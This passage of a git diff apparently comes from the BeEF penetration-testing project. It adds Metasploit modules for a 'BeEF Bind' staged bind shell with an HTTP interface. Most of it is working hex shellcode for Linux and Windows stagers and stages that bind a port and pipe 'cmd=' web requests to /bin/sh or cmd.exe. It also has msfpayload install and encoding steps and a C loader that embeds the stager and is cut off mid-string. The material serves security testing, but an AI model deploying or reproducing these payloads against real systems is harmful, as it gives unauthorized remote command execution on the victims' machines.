"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" + + "\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" + + "\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" + + "\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" + + "\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" + + "\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" + + "\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" + + "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" + + "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" + + "\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" + + "\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" + + "\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" + + "\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" + + "\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" + + "\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" + + "\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" + + "\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" + + "\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" + + "\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" + + "\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" + + "\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" + + "\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" + + "\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" + + "\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" + + "\xf6\x48\x31\xd2\x0f\x05" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb new file mode 100644 index 000000000..bbb9e715f --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb @@ -0,0 +1,84 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Bart Leppens' ], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 168, 'n' ] + }, + 'Payload' => + "\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" + + "\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" + + "\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" + + "\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" + + "\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" + + "\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" + + "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" + + "\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" + + "\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" + + "\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" + + "\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" + + "\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" + + "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" + + "\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" + + "\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" + + "\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" + + "\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" + + "\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" + + "\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" + + "\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" + + "\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" + + "\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" + + "\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" + + "\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" + + "\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" + + "\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" + + "\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" + + "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" + + "\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" + + "\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" + + "\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" + + "\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" + + "\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" + + "\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" + + "\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" + + "\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" + + "\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" + + "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb new file mode 100644 index 000000000..c9dc7767d --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb @@ -0,0 +1,137 @@ +## +# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$ +## + + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Windows + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind Windows Command Shell Stage (stager)', + 'Version' => '$Revision: 11421 $', + 'Description' => 'Spawn a piped command shell (staged) with an HTTP interface', + 'Author' => [ 'Ty Miller' ], + 'License' => BSD_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Session' => Msf::Sessions::CommandShellWindows, + 'PayloadCompat' => + { + 'Convention' => 'beef_bind' + }, + 'Stage' => + { + 'Offsets' => + { + 'LPORT' => [ 511, 'n' ] + }, + 'Payload' => + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" + + "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" + + "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" + + "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" + + "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" + + "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" + + "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" + + "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" + + "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" + + + "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" + + "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" + + "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" + + "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" + + "\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" + + "\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" + + "\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" + + "\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" + + "\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" + + "\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" + + + "\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" + + "\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" + + "\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" + + "\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" + + "\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" + + "\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" + + "\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" + + "\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" + + "\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" + + "\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" + + + "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" + + "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" + + "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" + + "\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" + + "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" + + "\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" + + "\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" + + "\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" + + "\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" + + "\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" + + + "\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" + + "\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" + + "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" + + "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" + + "\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" + + "\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" + + "\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" + + "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" + + "\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" + + "\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" + + + "\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" + + "\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" + + "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" + + "\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" + + "\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" + + "\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" + + "\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" + + "\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" + + "\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" + + "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" + + + "\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" + + "\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" + + "\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" + + "\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" + + "\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" + + "\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" + + "\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" + + "\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" + + "\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" + + "\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" + + + "\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" + + "\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" + + "\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" + + "\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" + + "\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" + + "\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" + + "\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" + + "\xff\xd5\xe9\x58\xfe\xff\xff" + } + )) + end + + # Stage encoding is safe for this payload + def encode_stage? + true + end +end + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb new file mode 100644 index 000000000..4ef9a5b10 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb @@ -0,0 +1,49 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/beef_bind' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Bart Leppens'], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'Handler' => Msf::Handler::BeEFBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [ 54, 'n' ] }, + 'Payload' => + "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" + + "\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" + + "\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" + + "\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" + + "\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" + + "\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" + + "\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" + + "\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" + + "\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" + + "\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" + + "\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" + + "\x01\xc6\xff\xe6" + } + )) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb new file mode 100644 index 000000000..7174e7498 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb @@ -0,0 +1,47 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/beef_bind' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Bart Leppens'], + 'License' => BSD_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BeEFBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [ 47, 'n' ] }, + 'Payload' => + "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" + + "\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" + + "\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" + + "\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" + + "\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" + + "\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" + + "\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" + + "\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" + + "\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" + + "\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7" + } + )) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb new file mode 100644 index 000000000..a8ae2da82 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb @@ -0,0 +1,62 @@ +## +# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/handler/beef_bind' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BeEF Bind HTTP Stager', + 'Version' => '$Revision: 9179 $', + 'Description' => 'Proxy web requests between a web browser and a shell', + 'Author' => ['Ty Miller'], + 'License' => BSD_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BeEFBind, + 'Convention' => 'beef_bind', + 'Stager' => + { + 'RequiresMidstager' => false, + 'Offsets' => { 'LPORT' => [ 200, 'n' ] }, + 'Payload' => + # Length: 299 bytes + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" + + "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" + + "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" + + "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" + + "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" + + "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" + + "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" + + "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" + + "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + + "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" + + "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" + + "\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" + + "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" + + "\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" + + "\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" + + "\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" + + "\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6" + } + )) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt new file mode 100644 index 000000000..d1c0fc2ff --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt @@ -0,0 +1,37 @@ + +Install into Metasploit on BackTrack: + +cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb +cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb +cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb +cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb +cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb +cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb +cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb + +Check it works: + +msfpayload -l | grep beef_bind + + +Get info on the payload: + +msfpayload windows/beef_shell/beef_bind S + + +Dump stager and stage in C format: + +msfpayload windows/beef_shell/beef_bind C + + +Dump stager in raw format: + +msfpayload windows/beef_shell/beef_bind R > beef_bind-stager + + +Encode stager to remove nulls: + +msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00' + + + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm new file mode 100644 index 000000000..43325cf76 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm @@ -0,0 +1,12 @@ + +[SECTION .text] +BITS 32 +[ORG 0] ;code starts at offset 0 + + cld ;clear the direction flag + call start ;jump over block_api and push its address onto the stack +%include "src/block_api.asm" +start: + pop ebp ;pop the address of block_api into ebp for calling functions later +%include "src/block_beef_bind-stage.asm" ;setup web listener to proxy requests and responses to the shell + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm new file mode 100644 index 000000000..5dc580486 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm @@ -0,0 +1,12 @@ + +[SECTION .text] +BITS 32 +[ORG 0] ;code starts at offset 0 + + cld ;clear the direction flag + call start ;jump over block_api and push its address onto the stack +%include "src/block_api.asm" +start: + pop ebp ;pop the address of block_api into ebp for calling functions later +%include "src/block_beef_bind-stager.asm" ;setup bind port, receive web request, locate stage, execute it + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c new file mode 100644 index 000000000..a939bd498 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c @@ -0,0 +1,36 @@ +/** + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +A standalone version can be compiled with MinGW: +c:\MinGW\bin>gcc -o beefstager.exe beefstager.c + +and then executed with: +c:\MinGW\bin>beefstager.exe 1234 + +or just with the default port 4444: +c:\MinGW\bin>beefstager.exe +**/ + + +#include + +char code[] = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5\xBB\x00\x10\x00\x00\x6A\x40\